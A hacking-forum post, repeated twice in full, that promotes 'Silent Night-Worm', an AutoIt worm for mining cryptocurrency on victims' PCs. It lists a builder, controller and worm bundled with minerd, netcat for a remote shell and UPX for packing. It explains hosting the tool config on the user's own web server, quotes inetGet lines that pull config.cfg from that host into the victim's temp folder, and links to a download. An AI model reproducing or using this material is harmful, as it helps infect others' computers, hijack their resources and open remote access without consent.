- Joined
- 22 May 2026
- Messages
- 29
- Reaction score
- 64
- Points
- 18
Use it on your own risk!
This is mini version of Silent Night-Worm GTR_ Alpha
Silent Night-Worm is Open Source and a simple worm For mining coded in autoit
you can mining with your victims Pcs by this worm
To Use
Note :- You need to upload Rar.exe and wget.exe and upload it from worm Controller To victim PC or modified config.cfg file and worm Func DownTools()
config.cfg
This is An importan File , All your tools (nc.exe - minerd.exe - config.json) in it with link Edit it and upload your tools and move it to your web server if you don't have Edit worm Func config() : To config.cfg link
$sN = inetGet('http://'&$Host&'/config.cfg' ,@TempDir & "\config.cfg", $INET_FORCERELOAD, $INET_DOWNLOADWAIT)
$sN = inetGet('http://YourFile/config.cfg' ,@TempDir & "\config.cfg", $INET_FORCERELOAD, $INET_DOWNLOADWAIT)
Note :-
upload option not tested !
some error with Client :\ need to fix !!
Download
Mini-G7R_ -> h t t p s : / / g i t h u b . c o m / v 1 p 3 r / S i l e n t - N i g h t - W o r m / r e l e a e s (*remove the spaces)
Feel Free To Develop Worm
This is mini version of Silent Night-Worm GTR_ Alpha
Silent Night-Worm is Open Source and a simple worm For mining coded in autoit
you can mining with your victims Pcs by this worm
To Use
Code:
Builder.au3
Worm Builder
Silent Night-Worm.au3
Controller
SN-Worm.au3
Worm
Tools :-
minerd.exe : CPU miner run 4 algos (neoscrypt - altscrypt - scrypt - sha256d)
nc.exe : NetCat For Remote CMD ;)
Rar.exe : Rar Archiver - Console
config.json : Your miner config
upx.exe : Pack Worm
Note :- You need to upload Rar.exe and wget.exe and upload it from worm Controller To victim PC or modified config.cfg file and worm Func DownTools()
config.cfg
This is An importan File , All your tools (nc.exe - minerd.exe - config.json) in it with link Edit it and upload your tools and move it to your web server if you don't have Edit worm Func config() : To config.cfg link
$sN = inetGet('http://'&$Host&'/config.cfg' ,@TempDir & "\config.cfg", $INET_FORCERELOAD, $INET_DOWNLOADWAIT)
$sN = inetGet('http://YourFile/config.cfg' ,@TempDir & "\config.cfg", $INET_FORCERELOAD, $INET_DOWNLOADWAIT)
Note :-
upload option not tested !
some error with Client :\ need to fix !!
Download
Mini-G7R_ -> h t t p s : / / g i t h u b . c o m / v 1 p 3 r / S i l e n t - N i g h t - W o r m / r e l e a e s (*remove the spaces)
Feel Free To Develop Worm
